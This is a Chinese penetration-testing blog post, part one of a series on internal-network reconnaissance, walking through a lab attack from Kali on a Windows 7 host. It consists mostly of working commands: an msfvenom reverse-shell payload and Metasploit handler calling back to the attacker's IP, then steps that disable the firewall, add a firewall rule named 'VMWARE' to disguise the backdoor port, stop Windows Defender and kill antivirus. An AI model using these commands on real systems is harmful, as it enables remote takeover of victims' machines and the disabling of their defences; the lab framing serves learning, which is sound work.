当前位置:网站首页>内网渗透之内网信息收集(一)
内网渗透之内网信息收集(一)
2022-07-06 09:22:00 【不知名白帽】
目录
内网渗透之内网信息收集(二)_不知名白帽的博客-CSDN博客
Metasploit内网信息收集
攻击机 kali 192.168.0.103
靶机 win7 192.168.0.105
01msf反弹shell
首先生成一个payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=4444 -f exe > shell.exe

02msf反弹shell
配置反弹会话处理程序
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.103
set lport 4444
exploit

将payload发送到目标机器让其执行

执行成功

linux无法识别window汉字会乱码,修改一下代码页(65001代表的是UTF-8)

03通过shell关闭防火墙
shell(execute -f cmd -i -H)
netsh advfirewall set allprofiles state off (关闭防火墙)
netsh advfirewall show allprofiles (查看防火墙状况)

通过策略添加防火墙规则隐蔽行为
netsh advfirewall set add rule name= "VMWARE" protocol=TCP dir=in localport=4444 action=allow
netsh firewall add portopening TCP 4444 "VMWARE" ENABLE ALL
重启生效(令win7重启):
shutdown -r -f -t 0
04关闭杀毒软件
关闭windefend
net stop windefend
关闭杀毒软件
run killav
run post/windows/manage/killav
边栏推荐
- Experiment five categories and objects
- [hand tearing code] single case mode and producer / consumer mode
- Nuxtjs quick start (nuxt2)
- Hackmyvm target series (7) -tron
- Leetcode. 3. Longest substring without repeated characters - more than 100% solution
- Thoroughly understand LRU algorithm - explain 146 questions in detail and eliminate LRU cache in redis
- Hackmyvm target series (4) -vulny
- Principles, advantages and disadvantages of two persistence mechanisms RDB and AOF of redis
- FAQs and answers to the imitation Niuke technology blog project (II)
- 记一次猫舍由外到内的渗透撞库操作提取-flag
猜你喜欢

Programme de jeu de cartes - confrontation homme - machine

"Gold, silver and four" job hopping needs to be cautious. Can an article solve the interview?

【VMware异常问题】问题分析&解决办法

撲克牌遊戲程序——人機對抗

Mode 1 two-way serial communication is adopted between machine a and machine B, and the specific requirements are as follows: (1) the K1 key of machine a can control the ledi of machine B to turn on a

Hackmyvm Target Series (3) - vues

Yugu p1012 spelling +p1019 word Solitaire (string)

7-5 走楼梯升级版(PTA程序设计)

How to understand the difference between technical thinking and business thinking in Bi?

记一次,修改密码逻辑漏洞实战
随机推荐
The difference between overloading and rewriting
7-5 staircase upgrade (PTA program design)
扑克牌游戏程序——人机对抗
About the parental delegation mechanism and the process of class loading
Which is more advantageous in short-term or long-term spot gold investment?
小程序web抓包-fiddler
Hackmyvm Target Series (3) - vues
[insert, modify and delete data in the headsong educator data table]
HackMyvm靶机系列(2)-warrior
.Xmind文件如何上传金山文档共享在线编辑?
Canvas foundation 1 - draw a straight line (easy to understand)
【Numpy和Pytorch的数据处理】
Read only error handling
中间件漏洞复现—apache
[three paradigms of database] you can understand it at a glance
Hackmyvm target series (4) -vulny
Hackmyvm target series (7) -tron
Middleware vulnerability recurrence Apache
HackMyvm靶机系列(6)-videoclub
Using qcommonstyle to draw custom form parts